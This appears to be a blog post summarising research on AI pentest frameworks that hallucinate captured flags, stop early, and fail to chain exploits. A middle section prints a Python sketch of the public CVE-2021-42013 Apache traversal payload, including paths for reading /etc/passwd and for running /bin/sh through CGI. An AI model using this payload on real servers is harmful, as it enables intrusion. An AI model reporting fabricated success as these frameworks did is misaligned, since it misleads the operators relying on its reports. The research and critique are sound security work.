Your AI pentester is hallucinating: 8 of 13 frameworks fabricated their own success
An AI pentest framework scans a web application. It finds a base64-encoded string on the homepage. It decodes the string: {I'm_a_Script_Kiddie}. It reports the flag as captured and terminates.
The real vulnerability, an LFI combined with arbitrary file upload enabling code execution, was never tested.
This happened in 8 of 13 open-source AI penetration testing frameworks, in the largest empirical comparison to date. Researchers from Sichuan University, Tsinghua, NUS, and four other institutions tested 13 frameworks and 2 baselines on 22 web penetration challenges from the XBOW cyber range. Over 10 billion tokens consumed. More than 1,500 execution logs manually reviewed over four months by 15+ cybersecurity researchers. The hallucination persisted when backbone LLMs were swapped to Claude Opus 4.6 or GPT-5.2. The problem is structural, not model-specific.
The AI offensive testing market is growing fast, with frontier labs and startups racing to automate penetration testing. This is the first study to systematically measure what those tools actually report when they claim success.
Highlights:
- 8 of 13 open-source AutoPT frameworks produced hallucinated flags on at least one challenge, misidentifying base64-encoded strings or format-similar text as real flags and terminating early. One framework, CHYing, hallucinated on 9 of 22 challenges. Two types were observed: string misjudgment, where the model mistakes a decodable string for a flag, and framework misjudgment, where internal matching logic prematurely declares success. Some frameworks also output candidate values like "probably flag" during summary stages after a task failure.
- On chained vulnerability exploitation (SSTI + LFI file upload), only 16.67% of 30 samples completed the multi-vulnerability chain. 70% of samples stalled in the first two capability stages, failing either to discover all vulnerabilities or to combine them. None of the 13 purpose-built frameworks could reliably chain multiple vulnerabilities.
- On known CVE exploitation (Apache 2.4.50, CVE-2021-42013), 56.67% of samples correctly identified the CVE but could not construct a working exploit payload. Only 26.67% reached successful exploitation. The 17 samples stuck in Stage 2 built the directory traversal payload but never attempted to combine it with remote code execution.
- Baseline AI coding agents with minimal prompts outperformed most of the 13 purpose-built frameworks: Kimi CLI scored 72, beating 9 of them; Claude Code scored 69, beating 8. The specialized frameworks scored between 18 and 88. On Easy and Medium challenges, single-agent architectures with standard ReAct loops matched or surpassed complex multi-agent designs.
- External knowledge bases frequently hurt performance. After KB removal, 3 of 6 frameworks improved: Cruiser from 42 to 57, LuaN1ao from 83 to 90, CyberStrike from 55 to 61. In LuaN1ao, only 22 of 44 execution logs triggered knowledge retrieval at all, and the highest RAG-to-total call ratio was 1.8%. Mismatched retrieval content steered agents toward incorrect attack hypotheses.
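The Stage-2 gap on CVE-2021-42013 is concrete. The publicly documented payload double-URL-encodes "." as `.%%32%65` to slip past Apache's path normalization check; turning the resulting file read into RCE is one further step (routing the traversal through mod_cgi to a shell). A minimal string-construction sketch of that public payload, for illustration only; whether the RCE step works depends on the target having CGI enabled:

```python
# Illustrative payload construction for CVE-2021-42013 (Apache 2.4.49/2.4.50
# path traversal). ".%%32%65" decodes once to ".%2e" and again to "..",
# defeating the path check. String building only; no requests are sent.
TRAVERSAL = "/.%%32%65" * 4  # climb four directory levels out of cgi-bin

# The read primitive most stuck samples reached (Stage 2):
file_read = f"/cgi-bin{TRAVERSAL}/etc/passwd"

# The combination step they never attempted: traverse to /bin/sh and POST
# a command through mod_cgi (requires CGI enabled on the target).
rce_path = f"/cgi-bin{TRAVERSAL}/bin/sh"
rce_body = "echo Content-Type: text/plain; echo; id"

print(file_read)  # → /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
```

The distance between `file_read` and `rce_path` is one substitution and one POST body, which is what makes the 56.67%-identified-but-26.67%-exploited gap striking.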
My take:
- The hallucination finding is easy to sensationalize. But it requires context. These frameworks ran on XBOW, a CTF cyber range with server-side flag validation. The benchmark rejected every hallucinated flag. The scores are accurate. No framework got credit for a fake flag.
- The real damage is subtler. When a framework finds a base64-encoded string on a homepage and declares victory, it stops. It never reaches the actual vulnerability. CHYing hallucinated on 9 of 22 challenges. That is not a reliability problem. That is a coverage problem. Nearly half the attack surface was never tested because the tool convinced itself the job was done.
- Now move this outside a CTF. In production, there is no scoring server and no ground truth to reject the false flag. The tool reports "vulnerability found" and the operator sees a clean report. This is how you get slop in AI-generated vulnerability reports: not because the model cannot find real vulnerabilities (it can), but because the same pattern-matching that makes it effective also makes it stop too early when it sees something that looks like success. The output format is identical either way. You cannot tell from the report whether the work was done.
- This connects to a pattern we keep seeing. Microsoft's vibe detection study found AI-generated detection rules matched the right threat 99.4% of the time but only 8.9% included the exclusion logic needed to prevent false positives. Seven agent skill scanners agreed on 0.12% of their malicious skill flags. Same failure mode across all three domains: the AI completes the easy step, skips the hard one, and the output looks the same either way.